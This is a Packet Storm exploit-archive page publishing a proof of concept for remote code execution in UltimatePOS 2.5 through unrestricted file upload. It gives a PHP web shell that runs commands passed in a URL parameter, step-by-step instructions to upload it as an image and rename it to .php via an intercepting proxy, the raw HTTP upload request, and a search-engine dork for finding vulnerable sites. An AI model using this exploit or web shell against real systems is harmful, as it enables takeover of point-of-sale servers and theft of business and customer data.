Twenty Year Anniversary

UltimatePOS 2.5 Remote Code Execution

UltimatePOS 2.5 Remote Code Execution
Posted Aug 25, 2018
Authored by Renos Nikolaou

UltimatePOS version 2.5 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
MD5 | 7dcff43f32efb84b40d84e67f281b0a6

UltimatePOS 2.5 Remote Code Execution

Change Mirror Download
# Exploit Title: UltimatePOS 2.5 - Remote Code Execution
# Google Dork: intext:"UltimatePOS"
# Date: 2018-08-22
# Exploit Author: Renos Nikolaou
# Vendor Homepage: http://ultimatefosters.com/
# Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431
# Version: 2.5
# Tested on: Windows 10
# CVE: N/A
# Description : UltimatePOS 2.5 allows users to upload arbitrary files which
# leads to a remote command execution on the remote server.

# PoC
# 1) Create a file with the below PHP code and save it as jpg

<?php $cmd=$_GET['cmd']; system($cmd); ?>

# 2) Login to UltimatePOS portal as low priviliage user
# 3) At the left hand side go to Products --> List Products ( http://domain/products )
# 4) Click at the Actions button of a current product --> Edit
# (NOTE: Attack works if you add new product as well)
# 5) Under Product image: click Browse and upload your jpg file containing the PHP code mentioned at step 1.
# (Make sure to use proxy like Burp, Fiddler etc..etc)
# 6) Scroll Down, click Update and Intercept the request using proxy
# 7) Forward the requests until you reach the from request containing the product details
# (See the request below) including the filename of the file that you have uploaded.
# 8) Edit the filename from filename.jpg to filename.php and then release the Interception.
# 9) Go to the List Products again (Step 3) and fine the product that you have edited.
# 10) Right click at the Product image and select Copy image Location
# 11) Paste the URL into your browser. Will be similar to: http://domain/storage/img/1533988576_cmd.php
# 12) Verify the exploit: http://domain/storage/img/1533988576_cmd.php?cmd=id


# The request:
===================

POST /products/64 HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/products/64/edit
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------3062816822434
Content-Length: 2868

...

50
-----------------------------3062816822434
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: image/jpeg

<?php $cmd=$_GET['cmd']; system($cmd); ?>

-----------------------------3062816822434
Content-Disposition: form-data; name="weight"

pos_confirmed.PNG

...

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    1 Files
  • 18
    Nov 18th
    1 Files
  • 19
    Nov 19th
    3 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close